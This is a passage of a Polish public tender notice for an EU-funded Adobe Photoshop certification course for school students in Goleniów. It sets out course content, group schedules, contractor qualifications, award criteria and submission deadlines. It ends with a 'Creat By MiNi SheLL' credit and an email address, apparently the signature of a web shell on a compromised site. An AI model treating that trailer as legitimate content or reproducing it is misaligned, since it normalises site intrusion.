współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus w ramach programu Fundusze Europejskie na rzecz Pomorza Zachodniego 2021–2027, działanie 6.10. Edukacja zawodowa. <br/><br/>Celem zamówienia jest organizacji kursu Certified Associate Adobe Photoshop, zakończonego zdobyciem przez uczestników certyfikatu Adobe Certified Professional (dawniej Adobe Certified Associate – ACA) potwierdzającego kompetencje cyfrowe w pracy z grafiką komputerową. Kurs obejmuje praktyczne zajęcia z zakresu tworzenia i edycji obrazów cyfrowych, prowadzonych zgodnie z aktualnymi standardami branżowymi oraz wytycznymi egzaminacyjnymi Adobe Certified Professional (dawniej Adobe Certified Associate – ACA). <br/><br/>2. Zakres szkolenia: <br/>a)	Liczba uczestników: <br/>-	Rok szkolny 2025/2026 – 9 grup po 10 osób (łącznie ok. 120 uczestników); <br/>-	Rok szkolny 2026/2027 – 9 grup po 10 osób (łącznie ok. 60 uczestników)<br/>b)	Czas trwania: 40 godz. na grupę. Liczba godzin nie obejmuje przeprowadzenia egzaminu potwierdzającego kompetencje cyfrowe w pracy z grafiką komputerową. <br/>c)	Umowa obowiązuje do 30 czerwca 2027 r. <br/>d)	Treści szkoleniowe: <br/>a)	Wprowadzenie do środowiska Adobe Photoshop (podstawowa konfiguracja Adobe Photoshop, Zarządzanie dokumentami, Praca z formatami plików); <br/>b)	Tworzenie i edycja obrazów cyfrowych zgodnie z nowoczesnymi standardami branżowymi (warstwy, narzędzia selekcji, retuszowanie obrazów, modyfikacja kolorów i tonacji);<br/>c)	Tworzenie grafiki do Internetu (optymalizacja obrazów, przygotowanie obrazów do publikacji na stronach internetowych, interaktywność)<br/>d)	Tworzenie grafiki do mediów drukowanych (przygotowanie plików do druku, zarządzanie tekstem, zasady przygotowania do druku); <br/>e)	Zasady prawa autorskiego oraz licencji cyfrowych (używanie zasobów online, licencje i prawa użytkowania). <br/>3.	Terminy realizacji kursów: <br/>- 10.09. – 20.12.2025 : 4 grupy po 10 osób (40 osób),<br/>- 10.01. – 30.05.2026: 5 grupy po 10 osób (50 osób),<br/>- 10.09. – 20.12.2026: 4 grupy po 10 osób (40 osób),<br/>- 10.01. – 30.05.2027: 5 grupy po 10 osób (50 osób).<br/><br/><br/><br/>4.	WYMAGANIA: <br/>-	Wykonawca zobowiązany jest do zapewnienia wszelkich materiałów, w tym materiałów edukacyjnych zgodnych ze szkoleniem oraz niezbędnych do przygotowania uczestników do egzaminu certyfikującego. <br/>-	Wykonawca zobowiązany jest do zapewnienia niezbędnego sprzętu oraz legalnego oprogramowania, w tym dostępu do aktualnej wersji programu Adobe Photoshop, umożliwiającego realizację pełnego zakresu treści szkoleniowych. <br/>-	Sprzęt oraz oprogramowanie muszą być w pełni sprawny technicznie, bezpieczny w użytkowaniu, spełniający obowiązujące normy BHP oraz dostosowany do poziomu kształcenia uczestników,<br/>-	Szkolenie może być prowadzone w trybie zdalnym, pod warunkiem uprzedniego uzgodnienia tego trybu z Zamawiającym oraz zapewnienia odpowiednich warunków technicznych umożliwiających efektywną realizację zajęć online. W przypadku szkoleń zdalnych Wykonawca zapewni platformę edukacyjną umożliwiającą prowadzenie zajęć w czasie rzeczywistym (np. Zoom, MS Teams, Google Meet) oraz dostęp do materiałów edukacyjnych w formie elektronicznej.<br/>-	Wykonawca zobowiązany jest do zapewnienia odpowiednio wykwalifikowanej kadry szkoleniowej, posiadającej doświadczenie oraz przygotowanie dydaktyczne w zakresie grafiki komputerowej oraz potwierdzone przygotowanie dydaktyczne, w tym aktualny certyfikat Adobe Certified Professional. <br/>-	Wykonawca zobowiązany jest do zapewnienia i pokrycia wszelkich kosztów związanych z przeprowadzeniem egzaminu certyfikującego Adobe Certified Professional in Visual Desing Using Adobe Photoshop, zgodnie z wytycznymi producenta oprogramowania (Adobe) oraz procedurą egzaminacyjną Certiport. <br/>-	Wykonawca zobowiązany jest do dokumentacji przebiegu szkolenia, np. poprzez: listy obecności, harmonogram zajęć, wyniki egzaminacyjne – w tym poświadczenia i certyfikaty uczniów, którzy uczestniczyli w egzaminie, ankiety ewaluacyjne potwierdzające jakość szkolenia. <br/>-	Wykonawca ponosi odpowiedzialność za zapewnienie ubezpieczenia uczestników kursów od następstw nieszczęśliwych wypadków na czas trwania szkolenia i egzaminów. <br/>-	Wykonawca zobowiązany jest do przedłożenia aktualnego zaświadczenia o niekaralności osób wyznaczonych do prowadzenia szkoleń, wystawionego nie wcześniej niż 3 miesiące przed dniem złożenia oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osoby na umowę o pracę (art. 95 PZP)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Część I<br/>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza w tym zakresie warunków udziału w postepowaniu.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> Zamawiający nie wyznacza w tym zakresie warunków udziału w postepowaniu.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>4)	Zamawiający nie wyznacza w tym zakresie warunków udziału w postepowaniu.<br/>5)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>1.	Minimum dwuletnie doświadczenie w organizacji szkoleń zawodowych w danej branży - wymagane poświadczenie: <br/>1)	wykaz zrealizowanych szkoleń w ostatnich dwóch latach (zawierający nazwy kursów, terminy realizacji, liczbę uczestników, referencje) - załącznik nr 4a do SWZ. <br/>2.	Posiadanie wykwalifikowanej kadry instruktorskiej z udokumentowanym doświadczeniem - załącznik nr 7a do SWZ); <br/>wymagane poświadczenie:<br/>1)	CV trenerów i instruktorów z opisem doświadczenia i kwalifikacji, <br/>2)	kopie certyfikatów, dyplomów lub uprawnień instruktorskich, mistrza w zawodzie, potwierdzony stosownym certyfikatem wydanym przez Izbę Rzemieślniczą lub inną uprawnioną instytucję, <br/>-	Zaplecze techniczne: <br/>a)	Zapewnienie profesjonalnego sprzętu i materiałów do realizacji szkoleń; <br/>b)	Dostarczenie materiałów szkoleniowych. <br/>-	Kwestie formalne: <br/>a)	Posiadanie wpisu do Rejestru Instytucji Szkoleniowych (RIS) lub innego odpowiedniego rejestru; <br/>b)	Ubezpieczenie OC na czas realizacji szkolenia – kopia stosownego dokumentu poświadczona przy podpisywaniu umowy (nie wymagane na etapie składania oferty);<br/>c)	Gotowość do dostarczenia pełnej dokumentacji potwierdzającej realizację kursu (listy obecności, raporty, zdjęcia z zajęć, ankiety ewaluacyjne); <br/>d)	Zaświadczenie o niekaralności (przez osoby przeprowadzające szkolenie) wystawione nie wcześniej niż 3 miesiące przed dniem złożenia oferty.<br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegający się o udzielenie zamówienia <br/>w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców oraz żąda dołączenia do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy <br/>w odniesieniu do warunków, które zostały opisane w VIII ust. 2 pkt 4 lit. a. <br/>4.	Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, <br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/><br/>Część II<br/><br/>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza w tym zakresie warunków udziału w postepowaniu.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> Zamawiający nie wyznacza w tym zakresie warunków udziału w postepowaniu.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie wyznacza w tym zakresie warunków udziału w postepowaniu.<br/>6)	zdolności technicznej lub zawodowej:<br/><br/>Wykonawca spełni warunek, jeżeli wykaże, że: <br/>-	Minimum dwuletnie doświadczenie w organizacji szkoleń zawodowych w danej branży – wymagane poświadczenie: <br/>a)	Wykaz zrealizowanych szkoleń w ostatnich dwóch latach (zawierający nazwy kursów, terminy realizacji, liczbę uczestników, referencje) – załącznik nr 4b do SWZ;<br/>b)	Posiadanie certyfikowanych instruktorów z kwalifikacjami w zakresie grafiki komputerowej, trenerzy powinni posiadać doświadczenie zawodowe w zakresie obsługi Adobe Photoshop – załącznik nr 7b do SWZ, wymagane poświadczenie:<br/>1)	Wykaz zrealizowanych szkoleń w ostatnich dwóch latach (zawierający nazwy kursów, terminy realizacji, liczbę uczestników, referencje) – załącznik nr 4b do SWZ; <br/>2)	Kopie certyfikatów, dyplomów lub uprawnień instruktorskich, mistrza w zawodzie, potwierdzony stosownym certyfikatem wydany przez Izbę Rzemieślniczą lub inną uprawnioną instytucję. <br/>- Zaplecze techniczne: <br/>a) Zapewnienie profesjonalnego oprogramowania i sprzętu komputerowego do realizacji szkoleń;<br/>b) Dostarczenie materiałów szkoleniowych; <br/>c) Możliwość realizacji kursów na terenie Zespołu Szkół nr 1 w Goleniowie bądź w trybie online<br/>- Kwestie formalne: <br/>a) Posiadanie wpisu do Rejestru Instytucji Szkoleniowych (RIS) lub innego odpowiedniego rejestru; <br/>b) Ubezpieczenie OC na czas realizacji szkolenia – kopia stosownego dokumentu poświadczona przy podpisywaniu umowy (nie wymagane na etapie składania oferty);<br/>c) Gotowość do dostarczenia pełnej dokumentacji potwierdzającej realizację kursu (listy obecności, raporty, zdjęcia z zajęć, ankiety ewaluacyjne), <br/>d) Zaświadczenie o niekaralności (przez osoby przeprowadzające szkolenie) wystawione nie wcześniej niż 3 miesiące przed dniem złożenia oferty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z zapisami SWZ. Rozdział X. Podmiotowe środki dowodowe. Oświadczenia i dokumenty, jakie zobowiązani są dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz wykazania braku podstaw wykluczenia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami projektu umowy załączonej do SWZ (dla część I i II). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/sp_goleniow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-15 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 29 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com